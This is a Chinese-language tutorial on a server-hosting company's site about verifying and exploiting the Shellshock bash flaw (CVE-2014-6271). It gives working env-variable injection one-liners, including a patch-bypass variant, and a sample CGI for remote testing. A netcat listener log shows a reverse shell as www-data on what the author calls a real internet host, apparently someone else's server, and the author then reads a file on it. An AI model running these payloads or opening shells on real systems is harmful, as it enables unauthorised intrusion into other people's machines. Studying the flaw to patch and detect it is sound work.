欢迎您,零度科技专业海外服务器租用
公司电话: 24小时电话: 

当前位置:首页>帮助教程>Linux 系统教程

目录导航

BASH 漏洞:cve-2014-6271验证与利用

美国西岸机房 发布于 2014-09-26  

Linux 系统教程

Stephane Schazelas最近发现BASH的一个BUG,问题在于BASH在处理环境变量的时候,这个漏洞影响bash版本1.14 - 4.3,

受影响的发行版本包括

Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution
CentOS (versions 5 through 7)
Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS
Debian

本地测试方法

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
BASH 漏洞:cve-2014-6271验证与利用-图片1
BASH 漏洞:cve-2014-6271验证与利用-图片1

上面是我在kali上的测试结果
远程测试方法:
首先用BASH写一个CGI
root@kali:/usr/lib/cgi-bin# cat bug.sh 
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>PoC</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
exit 0
放到/usr/lib/cgi-bin里,然后用curl访问
BASH 漏洞:cve-2014-6271验证与利用-图片2
BASH 漏洞:cve-2014-6271验证与利用-图片2

能打印出环境变量了。说明能够正常访问了。下面我们来反弹一个SHELL
BASH 漏洞:cve-2014-6271验证与利用-图片3
BASH 漏洞:cve-2014-6271验证与利用-图片3

访问看结果
BASH 漏洞:cve-2014-6271验证与利用-图片4
BASH 漏洞:cve-2014-6271验证与利用-图片4

后续其他的测试还在进行中。

注:android版本的bash也受影响
BASH 漏洞:cve-2014-6271验证与利用-图片5
BASH 漏洞:cve-2014-6271验证与利用-图片5

参考文档:
http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/
https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
实际互联网测试例子:
root@kali:~# nc -vvlp 8080
listening on [any] 8080 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 41997
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),50001(gforge),50002(stats),50003(news),50006(tmp)
$ exit
sent 8, rcvd 161
成功利用一个,这居然是perl脚本,cgi的运行都受到影响。思考:难道是因为#!这个的意思,启动。。。启动。。。^_^
sh-4.1$ head moon.cgi
head moon.cgi
#!/usr/bin/perl
#
# moon.cgi
#       Display a Moon image using the skycalc  program
#     by John Thorstensen and images generated by mp.
#
# Brian Casey
# Imagiware, Inc.

我自己机器的perl cgi没有利用成功,猜想和web server有关系,哎,还是知识不够。
老外文章有提到条件:
Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string)
ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.
DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.
Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.
Any other application which is hooked onto a shell or runs a shell script as using bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.
刚刚那个moon.cgi的perl脚本里面估计调用了oepn/exec之类的fork了bash
另外出的补丁,好像也能绕过,参考这里
https://twitter.com/taviso/status/514887394294652929
利用:
env lol='() { (nothing)=>' sh -c "echo date"; echo “vulnerable"
老外说的SSH利用,是需要账号的,更多的是越权,参考
https://about.gitlab.com/2014/09/24/gitlab-shell-and-bash-cve-2014-6271/
老外的SNORT的防护规则
http://www.volexity.com/blog/?p=19
另一个互联网实际的反弹SHELL例子:
BASH 漏洞:cve-2014-6271验证与利用-图片6
BASH 漏洞:cve-2014-6271验证与利用-图片6

BASH 漏洞:cve-2014-6271验证与利用-图片7
BASH 漏洞:cve-2014-6271验证与利用-图片7

原文来自零度科技:http://www.ldisp.com/a/linux/2014/bash-bug-2014-6271.shtml

上一篇:Apache 防盗链,Apache 防盗链设置
下一篇:CentOS6.4 升级内核3.4.56步骤和方法

 
了解零度?

零度科技主营全球服务器租用,如果您有服务器租用需求请联系

海外服务器租用

推荐香港、美国、韩国。提供站群服务器、高防服务器租用

海外特价服务器

关注零度特价服务器频道,了解全球特价服务器。

1

业务咨询

    技术服务

      特价活动
        全站搜索
        热门搜索:
        会员
        0通知
        客服
        0特价
        搜索
        TOP
        香港高防服务器,远程桌面,韩国服务器,nginx,反向代理